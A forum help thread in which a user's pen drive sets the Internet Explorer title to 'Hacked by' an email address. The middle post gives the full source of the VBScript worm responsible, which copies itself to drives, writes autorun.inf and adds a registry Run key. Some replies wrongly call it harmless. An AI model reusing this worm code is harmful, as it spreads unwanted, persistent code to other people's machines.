SOS... hacker attack? or Bluff ?

Status
Not open for further replies.
gsoul2soul

gsoul2soul

WOW... are you?
After using the PENDRIVE at my office... I get this weird thing at HOME!!!

(point to note: "I do check my pendrive with antivirus avast... and i update the virus definition daily)

And the virus software doesn't find anything on it!!!

Now... first of all my pendrive won't open when i double click... if i do it takes time and open in explorer (i can sense something has been started)

Then it's all fine and dandy... until i restart my PC (there's this weird TEXTfile that opens... on it there are some weird things written, more like language of some sort)

Then when i check my service... there is this one thing running "MFC32.DLL.VBS"
(which i can never... find, if it try to DELETE)... when i disable it by "msconfig" the notepad with that thing won't show!!

BUT......

When i open my IE browser on the TITLE bar it's writted Hacked by GNUlihd@gmail.com

HELP.... i'm scared to even log into my email accounts, is anybody logging me? or is it a prank? help
 
gxsaurav

gxsaurav

You gave been GXified
just a script which changed a few things in registry

u need to open the pen drive, try command prompt. U need to check that VBS file, it is not a virus just a prank, or Avast have found a malicious code. That VB script just changed the registry for the IE titlebar text

another option is firefox, open firefox, & type <x>:\ in the address bar where x is the drive letter of your pen drive. then nevigate to the file & read it.

From now on, just to be on safe side. Disable Autoplay for drives
 
OP
gsoul2soul

gsoul2soul

WOW... are you?
well... it's something in my PENDRIVE !!! (Im sure... it's still there)

I tried doing like you said... even scaned my pendrive it won't say anything.

I click on my "i drive" that's my pendrive... and suddenly it opens in "Explorer"

and WALLA.... the message "Hacked by GNUlihd@gmail.com" appears on IE title bar

Now... how the F@#K am i to see this file in my pendrive? how ? how?
I'm using Avast antivirus... and i updated my virus defintion before i scaned the pen drive!!!

HELP !!!
 
it_waaznt_me

it_waaznt_me

Coming back to life ..
Start > Run > Cmd {Press Enter}
On the command prompt, type :
I: {Press ENter}

What do you see ?

Say the filename is MFC32.DLL.VBS

So the directory listing should be like :
I:\mfc32.dll.vbs

on the command prompt, type :
mkdir d:\safe

move mfc32.dll.vbs d:\safe\mfc.txt

The file should be moved to D drive with txt extension. You can now delete it safely.

[Edit] You may also use this guide. Provides step by step instructions on how to remove this particular virus.
 
Last edited:
OP
gsoul2soul

gsoul2soul

WOW... are you?
Well... i easily deleted "MFC32.DLL.VBS" and "Autorun" (in my pendrive and my C drive) by simply enabling the "View System files" in Folder option.

Anyways... i did open the script file with "notepad" and here's the whole thing:

Is it something dangerous or just that "IE title bar thing?"

******************************

'A mod from nepal V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MFC32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MFC32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by GNUlihd@gmail.com"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
 
Last edited:
it_waaznt_me

it_waaznt_me

Coming back to life ..
Nothing dangerous, its just changing the title bar of IE and checking and running the script file every hour.
 
gtoX

gtoX

Broken In
Anyways, it seems it's nothing harmful, just some kiddie working around with scripts to learn something. I found the fix for the problem in his/her (?) blog itself (*matrixalaya.blogspot.com/2007/04/hacked-by-gnulihd.html).


Have fun fixing the "virus" :)
 
Status
Not open for further replies.
Top Bottom